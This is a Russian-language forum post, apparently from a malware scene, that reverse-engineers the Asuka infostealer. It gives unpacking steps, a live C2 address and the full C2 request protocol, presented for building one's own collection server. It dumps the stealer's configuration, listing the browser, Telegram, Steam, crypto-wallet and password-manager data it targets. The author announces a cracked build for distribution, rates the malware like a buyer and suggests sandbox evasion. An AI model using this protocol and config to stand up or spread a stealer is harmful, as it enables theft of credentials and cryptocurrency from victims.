Asuka ******* - переписанный ObserverStealer не стоит своих денег

ВВЕДЕНИЕ​

Здравствуйте. После долгого отсутствия, я решил вновь вернуться и принести вам в подарок новый разбор *******а и его патч.

На нашем столе сегодня проект с анимешным названием Asuka *******. Как обычно, я старался выбирать из новых проектов - просто зашёл в раздел вредоносного ПО, и глянул, что сегодня в моде.

А отдельную благодарность, как обычно, выношу AnyRun за идентификацию и хранение одного из стабов данного вредоноса - https://app.any.run/tasks/21c8f97d-8b88-41a5-bc02-34a5c16794a5/
Дополнительная статья по *******у - https://securityonline.info/asukastealer-analysis-of-a-new-information-stealing-malware/

Также я открыл чат, в котором вы можете задать мне вопрос по старым патчам MarsStealer и другим проектам - https://t.me/LLCPPC_REVERSE.​

Сразу предупреждаю, что в статье не будет очевидных вещей. К примеру, описание функционала *******а - вы это можете и так на каждом углу прочитать (в той же теме автора), а также описание того, как ******* собирает данные - потому что все они собирают данные почти одинаково.
Итак, приступаем к анализу...

СТАТИЧЕСКИЙ АНАЛИЗ​

Проект написан на С++, и опираясь на статью коллег-вирусологов, это переписанный ObserverStealer.
Как и ожидалось, данный стаб был закриптован каким-то самописным упаковщиком.
Размер - 371 кб, оригинальный размер - 261 кб.
Тут ничего интересного не могу сказать. Распаковка далее...

ДИНАМИЧЕСКИЙ АНАЛИЗ​

Итак, закидываем пациента в x64dbg, и смотрим:

Функционал упаковщика:
1. Инициализация библиотек - ничего необычного, просто подгрузка библиотек и всякая остальная скучная рутина
2. Расшифровка (длинный листинг инструкций rol/ror и других операций) - сам алгоритм упаковщика

Скриншоты

3. Скрытие потока (довольно интересное, через FlsSetValue, хвалю!). Возможно, это даже от самого *******а? Но от ревёрсера не спасёт

4. Запуск скрытого потока расшифрованного оригинального стаба

Технология обхода:
1. Ставим точку останова на CreateThread, шагаем
2. В EAX адрес на OEP (оригинальная точка входа расшифрованного стаба).
3. Готово! Можете через Scylla сдампить из памяти оригинальный стаб, но придётся подправить импорт-таблицу.

Теперь приступим к самому главному. Пропускаем различные функции инициализации, листаем пока не увидите комментарий "MZ" у аргумента возле вызова функции - это главная функция. Переходим в неё...

Скриншоты

Тут всё по классике, как и с MarsStealer - подгрузка библиотек и функций, расшифровка и, самое интересное, отправка запросов и главный функционал *******а. Почему все *******ы такие шаблонные? ...

Скриншоты

​

Сразу замечание: IP шифруется обычным XOR! Да уж, а это точно стоит 80 долларов?

Запросы реализованы через WinHttp. Отчёт по запросам (если кто-то захочет написать свой сервер):​

ОРИГИНАЛЬНЫЙ СЕРВЕР: http://5.42.66.25:3000/

Спойлер

0.
Запрос: http://ip:port/s?id=USER_ID
Ответ: возвращает plain/text в виде какого-то ключа (?) - так и не разобрался, но и не суть. Если эмулировать свой сервер, можно ему возвращать одинаковое значение постоянно, так тоже всё работает.
1.
Запрос: http://ip:port/?id=USER_ID
Ответ: возвращается конфиг - в нём прописаны кошельки, какие функции включены, пути к браузерам и пр. данные. Не шифруется , фу!
2.
Запрос:
POST: http://ip:port/
CONTENT: {xxxxxx-xxxx-xxxxx-xxxx-xxxxxxx}. Скорее всего, HWID. Не суть.
Ответ: "ok"
3.
Запрос:
POST: http://ip:port/
CONTENT: json в виде данных жертвы - какое ПО установлено, имя пользователя, какой процессор, сколько ОЗУ и много другой информации.
Ответ: "ok"
4.
Запрос:
POST: http://ip:port/
CONTENT: Скриншот активного окна\экрана (png).
Ответ: "ok"
5.
Все последующие запросы отправляются данные (Steam, Firefox) POST-запросом. Пример:
--e7383266-81a4-4d0a-bf50-e016ffdcac79
Content-Disposition: form-data; name="filename"; filename="filename"
Content-Type: application/octet-stream
[файл]

Кстати, заметил интересную вещь - похоже, оригинальный сервер блокирует IP от AnyRun. Непонятно, чем это поможет. Лучше бы сделали защиту на стороне клиента, там один процесс проверить, я давно писал статью, как на ассемблере сделать защиту от AnyRun.

Пример конфига *******а. По нему можете понять его функционал более подробно:

Конфигурация

gecko;discord;chromium;download;grabbers;extensions;processGrabber;dll



Firefox

%USERPROFILE%/AppData/Roaming/Mozilla/Firefox

Waterfox

%USERPROFILE%/AppData/Roaming/Waterfox

K-Meleon

%USERPROFILE%/AppData/Roaming/K-Meleon

Thunderbird

%USERPROFILE%/AppData/Roaming/Thunderbird

IceDragon

%USERPROFILE%/AppData/Roaming/Comodo/IceDragon

Cyberfox

%USERPROFILE%/AppData/Roaming/8pecxstudios/Cyberfox

BlackHaw

%USERPROFILE%/AppData/Roaming/NETGATE Technologies/BlackHaw

PaleMoon

%USERPROFILE%/AppData/Roaming/Moonchild Productions/Pale Moon



-



DiscordPTB

%appdata%/discordptb/

DiscordCanary

%appdata%/discordcanary/

Discord

%appdata%/discord/



-



OperaGX

%USERPROFILE%/AppData/Roaming/Opera Software/Opera GX Stable

Battle.net

%USERPROFILE%/AppData/Local/Battle.net/BrowserCaches

Chromium

%USERPROFILE%/AppData/Local/Chromium/User Data

Google

%USERPROFILE%/AppData/Local/Google/Chrome/User Data

Google86

%USERPROFILE%/AppData/Local/Google(x86)/Chrome/User Data

Opera

%USERPROFILE%/AppData/Roaming/Opera Software/Opera Stable

ChromiumPlus

%USERPROFILE%/AppData/Local/MapleStudio/ChromePlus/User Data

Iridium

%USERPROFILE%/AppData/Local/Iridium/User Data

7Star

%USERPROFILE%/AppData/Local/7Star/7Star/User Data

CentBrowser

%USERPROFILE%/AppData/Local/CentBrowser/User Data

Chedot

%USERPROFILE%/AppData/Local/Chedot/User Data

Vivaldi

%USERPROFILE%/AppData/Local/Vivaldi/User Data

Kometa

%USERPROFILE%/AppData/Local/Kometa/User Data

Elements

%USERPROFILE%/AppData/Local/Elements Browser/User Data

EpicPrivacyBrowser

%USERPROFILE%/AppData/Local/Epic Privacy Browser/User Data

Uran

%USERPROFILE%/AppData/Local/uCozMedia/Uran/User Data

Sleipnir5

%USERPROFILE%/AppData/Local/Fenrir Inc/Sleipnir5/setting/modules/ChromiumViewer

Citrio

%USERPROFILE%/AppData/Local/CatalinaGroup/Citrio/User Data

Coowon

%USERPROFILE%/AppData/Local/Coowon/Coowon/User Data

liebao

%USERPROFILE%/AppData/Local/liebao/User Data

QIPSurf

%USERPROFILE%/AppData/Local/QIP Surf/User Data

Orbitum

%USERPROFILE%/AppData/Local/Orbitum/User Data

Comodo

%USERPROFILE%/AppData/Local/Comodo/Dragon/User Data

Amigo

%USERPROFILE%/AppData/Local/Amigo/User/User Data

Torch

%USERPROFILE%/AppData/Local/Torch/User Data

YandexBrowser

%USERPROFILE%/AppData/Local/Yandex/YandexBrowser/User Data

Comodo

%USERPROFILE%/AppData/Local/Comodo/User Data

360Browser

%USERPROFILE%/AppData/Local/360Browser/Browser/User Data

Maxthon3

%USERPROFILE%/AppData/Local/Maxthon3/User Data

K-Melon

%USERPROFILE%/AppData/Local/K-Melon/User Data

Sputnik

%USERPROFILE%/AppData/Local/Sputnik/Sputnik/User Data

Nichrome

%USERPROFILE%/AppData/Local/Nichrome/User Data

CocCoc

%USERPROFILE%/AppData/Local/CocCoc/Browser/User Data

Uran2

%USERPROFILE%/AppData/Local/Uran/User Data

Chromodo2

%USERPROFILE%/AppData/Local/Chromodo/User Data

Atom

%USERPROFILE%/AppData/Local/Mail.Ru/Atom/User Data

BraveSoftware

%USERPROFILE%/AppData/Local/BraveSoftware/Brave-Browser/User Data

Edge

%USERPROFILE%/AppData/Local/Microsoft/Edge/User Data

GeForceExperience

%USERPROFILE%/AppData/Local/NVIDIA Corporation/NVIDIA GeForce Experience

Steam

%USERPROFILE%/AppData/Local/Steam/htmlcache

CryptoTabBrowser

%USERPROFILE%/AppData/Local/CryptoTab Browser/User Data



-





-



Documents

%USERPROFILE%/Documents/

(.*)\.txt|(.*)\.rdp

1

Steam

C:\Program Files (x86)\Steam\

ssfn([0-9]+)|loginusers\.vdf|libraryfolders\.vdf|DialogConfig\.vdf|config\.vdf

1

Desktop

%USERPROFILE%/Desktop/

(.*)\.txt

1

Atomic

%appdata%/atomic/Local Storage/leveldb/

.*

0

Coinomi

%localappdata%/Coinomi/Cache/

.*

0

Coinomi

%localappdata%/Coinomi/Cache/db/

.*

0

Coinomi

%localappdata%/Coinomi/wallets/

.*

0

Electrum

%appdata%/Electrum/wallets/

.*

0

Monero

%userprofile%/Documents/Monero/wallets/

.*

0

Exodus

%APPDATA%/Exodus/

(.*)\.json|(.*)\.seco

1

Telegram

%appdata%/Telegram Desktop/tdata/

(.{16,17}$)|usertag|prefix|key_datas|settingss(\.(\w+))?|countries|devversion|configs|maps

1

FileZilla

%appdata%/FileZilla/

recentservers\.xml

0

Binance

%appdata%/Binance/

app-store\.json

0

Discord

%appdata%/discord/Local Storage/leveldb/

.*

0

Element

%appdata%/Element/Local Storage/leveldb/

.*

0



-



kmphdnilpmdejikjdnlbcnmnabepfgkh

osmwallet

jiepnaheligkibgcjgjepjfppgbcghmp

DogeLabsWallet

lgmpcpglpngdoalbgeoldeajfclnhafa

Safepal

keokhigifjinncljedmendkbikiakicj

EsetEdge

acnjjnipnlbppelaaoekjfacdbpibjol

CyclonisEdge

lcccdlklhahfmobgpnilndimkankpnkg

NortonEdge

bobgdmjpamhpbiobbklajbdkgmmmbcja

DualsafePasswordManager

lfochlioelphaglamdcakfjemolpichk

KeeperEdge

jbipmfkjgjhibkepepeneigpkfeikikp

StickyPassword

gpfoagmiheifcpjodakdcjjfjlbbchhb

steganos

eolheccophlcbnkkbelcgminoojochgj

KasperskyPasswordManager

jbkfoedolllekgbhcbcoahefnbanhhlh

BitwardenEdge

ljfpcifpgbbchoddpjefaipoiigpdmag

RoboformPasswordManager

emgfgdclgfeldebanedpihppahgngnle

Avira

aeblfdkhhhdcdjpifhhbdiojplfjncoa

1password

nngceckbapebfimnlniiiahkandclblb

bitwarden

cnlhokffphohmfcddnibpohmkdfafdli

MultiPassword

khhapgacijodhjokkcjmleaempmchlem

EsetPasswordManager

pnfpeedickdijmfpfcdgcofpoemmdpgi

CyclonisPasswordManager

fdjamakpfbbddfjaooikfcpapjohcfmg

DashLanePasswordManager

admmjipmmciaobhojoghlmleefbicajg

NortonPasswordManager

bfogiafebfohielmmehodmfbbebbbpei

KeeperPasswordManager

gplomcegacfeolmacnhpopbindboipfl

TeamPasswordManager

caljgklbbfbcjjanaijlacgncafpegll

AviraPasswordManager

mmhlniccooihdimnnjhamobppdhaolme

KeePasswordManager

fpkhgmpbidmiogeglndfbkegfdlnajnf

CosmoStation

mcohilncbfahbmgdjkbpemcciiolgcge

okxwallet

heefohaffomkkkphnlpohglngmbcclhi

MorphisWallet

gacgndbocaddlemdiaadajmlggabdeod

PocketUniverse

idnnbdplmphpflfnlkomgpfbpcgelopg

XverseWallet

ppbibelpcjmhbdihakflkdcoccbgbkpo

UniSat

ebfidpplhabeedpnhjnobghokpiioolj

FewchaMoveWallet

dmkamcknogkgcdfhhbddcghachkejeap

KeplrWallet

ojbpcbinjmochkhelkflddfnmcceomdi

Zecrey

fcfcfllfndlomdhbehjjcoimbgofdncg

LeapCosmosWallet

mcbigmjiafegjnnogedioegffbooigli

EthosSuiWallet

fiikommddbeccaoicoejoniammnalkfa

Nightly

icpikagpkkbldbfjlbefnmmmcohbjije

Z3US

feejiigddaafeojfddjjlmfkabimkell

Bitski

mlhakagmgkmonhdonhkpjeebfphligng

ABCWallet

jkjgekcefbkpogohigkgooodolhdgcda

BitPay

kilnpioakcdndlodeeceffgjdpojajlo

AuroxWallet

pdgbckgdncnhihllonhnjbdoighgpimk

WalletGuard

hoighigmnhgkkdaenafgnefkcmipfjon

EOFinanceWallet

jiidiaalihmmhddjgbnbgdfflelocpak

BitKeep-Wallet

agoakfejjabomempkjlepdflaleeobhb

CoreWallet

hifafgmccdpekplomjjkcfgodnhcellj

Crypto-Wallet

ojggmchlghnjlapmfbnjholfjkiidbch

VenomWallet

jnlgamecbpmbajjfhmmmlhejkemejdma

BraavosWallet

bhhhlbepdkbapadjdnnojkbgioiodbic

SolflareWallet

jnldfbidonfeldmalbflbmlebbipcnle

BitfinityWallet

fijngjgcjhjmmpcmkeiomlglpeiijkld

TalismanWallet

onhogfjeacnfoofkfgppdlbmlmnplgbn

SubWallet

ejjladinnckdgjemekebdpeokbikhfci

PetraWallet

phkbamefinggmakgklpkljjmgibohnba

PontemWallet

efbglgofoippbgcjepnhiblaibcnclgk

MartianWallet

opcgpfmipidbgpenhmajoajpbobppdil

SuiWallet

ejbalbakoplchlghecdalmeeeajnimhm

Metamask

dlcobpjiigpikoobohmabehhmhfoodbb

ArgentX

gmohoglkppnemohbcgjakmgengkeaphi

2FA-Authenticator

gaedmjdfmmahhbjefcbgaolhhanlaolb

Authy

ffnbelfdoeiohenkjibnmadjiehjhajb

YoroiWallet

ibnejdfjmmkpcnlpebklmnkoeoihofec

Tronlink

jbdaocneiiinmjbjlgalhcelgbejmnid

NiftyWallet

nkbihfbeogaeaoehlefnkodbefgpgknn

Metamask

afbcbjpbpfadlkmhmclhkeeodmamcflc

MathWallet

hnfanknocfeofbddgcijnmhnfnkdnaad

Coinbase

fhbohimaelbohpjbbldcngcnapndodjp

BinanceChain

hpglfhgfnhbgpjdenjgmdgoeiappafln

GuardaWallet

blnieiiffboillknjnepogjhkgnoapac

EqualWallet

cjelfplplebdjjenllpjcblmjkfcffne

JaxxxLiberty

fihkakfobkmkjojpchpfgcmhfjnmnfpi

BitAppWallet

kncchdigobghenbbaddojjnnaogfppfj

iWallet

amkmjjmmflddogmhpjloimipbofnfjih

Wombat

fhilaheimglignddkjgofkcbgekhenbh

AtomicWallet

nlbmnnijcnlegkjjpcfjclmcfggfefdm

MewCx

nanjmdknhkinifnkgdcggcfnhdaammmj

GuildWallet

nkddgncdjgjfcddamfgcmfnlhccnimig

SaturnWallet

fnjhmkhhmkbjkkabndcnnogagogbneec

SaturnWallet

fnjhmkhhmkbjkkabndcnnogagogbneec

RoninWallet

aiifbnbfobpmeekipheeijimdpnlpgpp

TerraStation

fnnegphlobjdpkhecapkijjdkgcjhkib

HarmonyWallet

aeachknmefphepccionboohckonoeemg

Coin98Wallet

cgeeodpfagjceefieflmdfphplkenlfk

TonCrystal

pdadjkfkgcafgbceimcpbkalnfnepbnk

KardiaChain

bfnaelmomeimhlpmgjnjophhpkkoljpa

Phantom

fhilaheimglignddkjgofkcbgekhenbh

Oxygen

mgffkfbidihjpoaomajlbgchddlicgpn

PaliWallet

aodkkagnadcbobfpggfnjeongemjbjca

BoltX

kpfopkelmapcoipemfendmdcghnegimn

LiqualityWallet

hmeobnfnfcmdkdcmlblgagmfpfboieaf

XdefiWallet

lpfcbjknijpeeillifnkikgncikgfhdo

NamiWallet

dngmlblcodfobpdpecaadgfbcggfjfnm

MaiarDeFiWallet

bhghoamapcdpbohphigoooaddinpkbai

Authenticator

ookjlbkiijinhpmnjffcofjonbfbgaoc

TempleWallet

aholpfdialjgjfhomihkjbmgjidlcdno

Exdous



-



Steam Desktop Authenticator.exe

/maFiles/

.*

0

Telegram.exe

/tdata/

(.{16,17}$)|usertag|prefix|key_datas|settingss(\.(\w+))?|countries|devversion|configs|maps

1

steam.exe

/

ssfn([0-9]+)|loginusers\.vdf|libraryfolders\.vdf|DialogConfig\.vdf|config\.vdf

1



-



freebl3.dll

libcrypto.dll

mozglue.dll

nss3.dll

softokn3.dll

sqlite3.dll



-

Код

gecko;discord;chromium;download;grabbers;extensions;processGrabber;dll







Firefox



%USERPROFILE%/AppData/Roaming/Mozilla/Firefox



Waterfox



%USERPROFILE%/AppData/Roaming/Waterfox



K-Meleon



%USERPROFILE%/AppData/Roaming/K-Meleon



Thunderbird



%USERPROFILE%/AppData/Roaming/Thunderbird



IceDragon



%USERPROFILE%/AppData/Roaming/Comodo/IceDragon



Cyberfox



%USERPROFILE%/AppData/Roaming/8pecxstudios/Cyberfox



BlackHaw



%USERPROFILE%/AppData/Roaming/NETGATE Technologies/BlackHaw



PaleMoon



%USERPROFILE%/AppData/Roaming/Moonchild Productions/Pale Moon







-







DiscordPTB



%appdata%/discordptb/



DiscordCanary



%appdata%/discordcanary/



Discord



%appdata%/discord/







-







OperaGX



%USERPROFILE%/AppData/Roaming/Opera Software/Opera GX Stable



Battle.net



%USERPROFILE%/AppData/Local/Battle.net/BrowserCaches



Chromium



%USERPROFILE%/AppData/Local/Chromium/User Data



Google



%USERPROFILE%/AppData/Local/Google/Chrome/User Data



Google86



%USERPROFILE%/AppData/Local/Google(x86)/Chrome/User Data



Opera



%USERPROFILE%/AppData/Roaming/Opera Software/Opera Stable



ChromiumPlus



%USERPROFILE%/AppData/Local/MapleStudio/ChromePlus/User Data



Iridium



%USERPROFILE%/AppData/Local/Iridium/User Data



7Star



%USERPROFILE%/AppData/Local/7Star/7Star/User Data



CentBrowser



%USERPROFILE%/AppData/Local/CentBrowser/User Data



Chedot



%USERPROFILE%/AppData/Local/Chedot/User Data



Vivaldi



%USERPROFILE%/AppData/Local/Vivaldi/User Data



Kometa



%USERPROFILE%/AppData/Local/Kometa/User Data



Elements



%USERPROFILE%/AppData/Local/Elements Browser/User Data



EpicPrivacyBrowser



%USERPROFILE%/AppData/Local/Epic Privacy Browser/User Data



Uran



%USERPROFILE%/AppData/Local/uCozMedia/Uran/User Data



Sleipnir5



%USERPROFILE%/AppData/Local/Fenrir Inc/Sleipnir5/setting/modules/ChromiumViewer



Citrio



%USERPROFILE%/AppData/Local/CatalinaGroup/Citrio/User Data



Coowon



%USERPROFILE%/AppData/Local/Coowon/Coowon/User Data



liebao



%USERPROFILE%/AppData/Local/liebao/User Data



QIPSurf



%USERPROFILE%/AppData/Local/QIP Surf/User Data



Orbitum



%USERPROFILE%/AppData/Local/Orbitum/User Data



Comodo



%USERPROFILE%/AppData/Local/Comodo/Dragon/User Data



Amigo



%USERPROFILE%/AppData/Local/Amigo/User/User Data



Torch



%USERPROFILE%/AppData/Local/Torch/User Data



YandexBrowser



%USERPROFILE%/AppData/Local/Yandex/YandexBrowser/User Data



Comodo



%USERPROFILE%/AppData/Local/Comodo/User Data



360Browser



%USERPROFILE%/AppData/Local/360Browser/Browser/User Data



Maxthon3



%USERPROFILE%/AppData/Local/Maxthon3/User Data



K-Melon



%USERPROFILE%/AppData/Local/K-Melon/User Data



Sputnik



%USERPROFILE%/AppData/Local/Sputnik/Sputnik/User Data



Nichrome



%USERPROFILE%/AppData/Local/Nichrome/User Data



CocCoc



%USERPROFILE%/AppData/Local/CocCoc/Browser/User Data



Uran2



%USERPROFILE%/AppData/Local/Uran/User Data



Chromodo2



%USERPROFILE%/AppData/Local/Chromodo/User Data



Atom



%USERPROFILE%/AppData/Local/Mail.Ru/Atom/User Data



BraveSoftware



%USERPROFILE%/AppData/Local/BraveSoftware/Brave-Browser/User Data



Edge



%USERPROFILE%/AppData/Local/Microsoft/Edge/User Data



GeForceExperience



%USERPROFILE%/AppData/Local/NVIDIA Corporation/NVIDIA GeForce Experience



Steam



%USERPROFILE%/AppData/Local/Steam/htmlcache



CryptoTabBrowser



%USERPROFILE%/AppData/Local/CryptoTab Browser/User Data







-











-







Documents



%USERPROFILE%/Documents/



(.*)\.txt|(.*)\.rdp



1



Steam



C:\Program Files (x86)\Steam\



ssfn([0-9]+)|loginusers\.vdf|libraryfolders\.vdf|DialogConfig\.vdf|config\.vdf



1



Desktop



%USERPROFILE%/Desktop/



(.*)\.txt



1



Atomic



%appdata%/atomic/Local Storage/leveldb/



.*



0



Coinomi



%localappdata%/Coinomi/Cache/



.*



0



Coinomi



%localappdata%/Coinomi/Cache/db/



.*



0



Coinomi



%localappdata%/Coinomi/wallets/



.*



0



Electrum



%appdata%/Electrum/wallets/



.*



0



Monero



%userprofile%/Documents/Monero/wallets/



.*



0



Exodus



%APPDATA%/Exodus/



(.*)\.json|(.*)\.seco



1



Telegram



%appdata%/Telegram Desktop/tdata/



(.{16,17}$)|usertag|prefix|key_datas|settingss(\.(\w+))?|countries|devversion|configs|maps



1



FileZilla



%appdata%/FileZilla/



recentservers\.xml



0



Binance



%appdata%/Binance/



app-store\.json



0



Discord



%appdata%/discord/Local Storage/leveldb/



.*



0



Element



%appdata%/Element/Local Storage/leveldb/



.*



0







-







kmphdnilpmdejikjdnlbcnmnabepfgkh



osmwallet



jiepnaheligkibgcjgjepjfppgbcghmp



DogeLabsWallet



lgmpcpglpngdoalbgeoldeajfclnhafa



Safepal



keokhigifjinncljedmendkbikiakicj



EsetEdge



acnjjnipnlbppelaaoekjfacdbpibjol



CyclonisEdge



lcccdlklhahfmobgpnilndimkankpnkg



NortonEdge



bobgdmjpamhpbiobbklajbdkgmmmbcja



DualsafePasswordManager



lfochlioelphaglamdcakfjemolpichk



KeeperEdge



jbipmfkjgjhibkepepeneigpkfeikikp



StickyPassword



gpfoagmiheifcpjodakdcjjfjlbbchhb



steganos



eolheccophlcbnkkbelcgminoojochgj



KasperskyPasswordManager



jbkfoedolllekgbhcbcoahefnbanhhlh



BitwardenEdge



ljfpcifpgbbchoddpjefaipoiigpdmag



RoboformPasswordManager



emgfgdclgfeldebanedpihppahgngnle



Avira



aeblfdkhhhdcdjpifhhbdiojplfjncoa



1password



nngceckbapebfimnlniiiahkandclblb



bitwarden



cnlhokffphohmfcddnibpohmkdfafdli



MultiPassword



khhapgacijodhjokkcjmleaempmchlem



EsetPasswordManager



pnfpeedickdijmfpfcdgcofpoemmdpgi



CyclonisPasswordManager



fdjamakpfbbddfjaooikfcpapjohcfmg



DashLanePasswordManager



admmjipmmciaobhojoghlmleefbicajg



NortonPasswordManager



bfogiafebfohielmmehodmfbbebbbpei



KeeperPasswordManager



gplomcegacfeolmacnhpopbindboipfl



TeamPasswordManager



caljgklbbfbcjjanaijlacgncafpegll



AviraPasswordManager



mmhlniccooihdimnnjhamobppdhaolme



KeePasswordManager



fpkhgmpbidmiogeglndfbkegfdlnajnf



CosmoStation



mcohilncbfahbmgdjkbpemcciiolgcge



okxwallet



heefohaffomkkkphnlpohglngmbcclhi



MorphisWallet



gacgndbocaddlemdiaadajmlggabdeod



PocketUniverse



idnnbdplmphpflfnlkomgpfbpcgelopg



XverseWallet



ppbibelpcjmhbdihakflkdcoccbgbkpo



UniSat



ebfidpplhabeedpnhjnobghokpiioolj



FewchaMoveWallet



dmkamcknogkgcdfhhbddcghachkejeap



KeplrWallet



ojbpcbinjmochkhelkflddfnmcceomdi



Zecrey



fcfcfllfndlomdhbehjjcoimbgofdncg



LeapCosmosWallet



mcbigmjiafegjnnogedioegffbooigli



EthosSuiWallet



fiikommddbeccaoicoejoniammnalkfa



Nightly



icpikagpkkbldbfjlbefnmmmcohbjije



Z3US



feejiigddaafeojfddjjlmfkabimkell



Bitski



mlhakagmgkmonhdonhkpjeebfphligng



ABCWallet



jkjgekcefbkpogohigkgooodolhdgcda



BitPay



kilnpioakcdndlodeeceffgjdpojajlo



AuroxWallet



pdgbckgdncnhihllonhnjbdoighgpimk



WalletGuard



hoighigmnhgkkdaenafgnefkcmipfjon



EOFinanceWallet



jiidiaalihmmhddjgbnbgdfflelocpak



BitKeep-Wallet



agoakfejjabomempkjlepdflaleeobhb



CoreWallet



hifafgmccdpekplomjjkcfgodnhcellj



Crypto-Wallet



ojggmchlghnjlapmfbnjholfjkiidbch



VenomWallet



jnlgamecbpmbajjfhmmmlhejkemejdma



BraavosWallet



bhhhlbepdkbapadjdnnojkbgioiodbic



SolflareWallet



jnldfbidonfeldmalbflbmlebbipcnle



BitfinityWallet



fijngjgcjhjmmpcmkeiomlglpeiijkld



TalismanWallet



onhogfjeacnfoofkfgppdlbmlmnplgbn



SubWallet



ejjladinnckdgjemekebdpeokbikhfci



PetraWallet



phkbamefinggmakgklpkljjmgibohnba



PontemWallet



efbglgofoippbgcjepnhiblaibcnclgk



MartianWallet



opcgpfmipidbgpenhmajoajpbobppdil



SuiWallet



ejbalbakoplchlghecdalmeeeajnimhm



Metamask



dlcobpjiigpikoobohmabehhmhfoodbb



ArgentX



gmohoglkppnemohbcgjakmgengkeaphi



2FA-Authenticator



gaedmjdfmmahhbjefcbgaolhhanlaolb



Authy



ffnbelfdoeiohenkjibnmadjiehjhajb



YoroiWallet



ibnejdfjmmkpcnlpebklmnkoeoihofec



Tronlink



jbdaocneiiinmjbjlgalhcelgbejmnid



NiftyWallet



nkbihfbeogaeaoehlefnkodbefgpgknn



Metamask



afbcbjpbpfadlkmhmclhkeeodmamcflc



MathWallet



hnfanknocfeofbddgcijnmhnfnkdnaad



Coinbase



fhbohimaelbohpjbbldcngcnapndodjp



BinanceChain



hpglfhgfnhbgpjdenjgmdgoeiappafln



GuardaWallet



blnieiiffboillknjnepogjhkgnoapac



EqualWallet



cjelfplplebdjjenllpjcblmjkfcffne



JaxxxLiberty



fihkakfobkmkjojpchpfgcmhfjnmnfpi



BitAppWallet



kncchdigobghenbbaddojjnnaogfppfj



iWallet



amkmjjmmflddogmhpjloimipbofnfjih



Wombat



fhilaheimglignddkjgofkcbgekhenbh



AtomicWallet



nlbmnnijcnlegkjjpcfjclmcfggfefdm



MewCx



nanjmdknhkinifnkgdcggcfnhdaammmj



GuildWallet



nkddgncdjgjfcddamfgcmfnlhccnimig



SaturnWallet



fnjhmkhhmkbjkkabndcnnogagogbneec



SaturnWallet



fnjhmkhhmkbjkkabndcnnogagogbneec



RoninWallet



aiifbnbfobpmeekipheeijimdpnlpgpp



TerraStation



fnnegphlobjdpkhecapkijjdkgcjhkib



HarmonyWallet



aeachknmefphepccionboohckonoeemg



Coin98Wallet



cgeeodpfagjceefieflmdfphplkenlfk



TonCrystal



pdadjkfkgcafgbceimcpbkalnfnepbnk



KardiaChain



bfnaelmomeimhlpmgjnjophhpkkoljpa



Phantom



fhilaheimglignddkjgofkcbgekhenbh



Oxygen



mgffkfbidihjpoaomajlbgchddlicgpn



PaliWallet



aodkkagnadcbobfpggfnjeongemjbjca



BoltX



kpfopkelmapcoipemfendmdcghnegimn



LiqualityWallet



hmeobnfnfcmdkdcmlblgagmfpfboieaf



XdefiWallet



lpfcbjknijpeeillifnkikgncikgfhdo



NamiWallet



dngmlblcodfobpdpecaadgfbcggfjfnm



MaiarDeFiWallet



bhghoamapcdpbohphigoooaddinpkbai



Authenticator



ookjlbkiijinhpmnjffcofjonbfbgaoc



TempleWallet



aholpfdialjgjfhomihkjbmgjidlcdno



Exdous







-







Steam Desktop Authenticator.exe



/maFiles/



.*



0



Telegram.exe



/tdata/



(.{16,17}$)|usertag|prefix|key_datas|settingss(\.(\w+))?|countries|devversion|configs|maps



1



steam.exe



/



ssfn([0-9]+)|loginusers\.vdf|libraryfolders\.vdf|DialogConfig\.vdf|config\.vdf



1







-







freebl3.dll



libcrypto.dll



mozglue.dll



nss3.dll



softokn3.dll



sqlite3.dll







-

Стаб я уже пропатчил, занимаюсь написанием сервера, который будет принимать все данные. Кряк появится уже на днях, а в моём Телеграм-чате первее! Ждите! @LLCPPC_REVERSE


Минусы:
- IP шифруется обычным XOR
- Конфиг *******а не шифруется - а там прописаны кошельки и другая информация
- Цена. Извините, но с учётом, что это переписанный Observer, ещё и достаточно кривой, не имеющий никаких особенностей - 7-10 тыс. за такое отдавать - воровство.
- Размер - потому что библиотеки вшиты внутрь, а не скачиваются с сервера, как это делали в Mars *******. Также это делает вредонос более лёгким для обнаружения

Плюсы:
- Маскировка потока
- Запросы через winhttp и urlmon. Обычно делают через wininet. Но, опять же, это, вроде, реализация Observer, а не Asuka.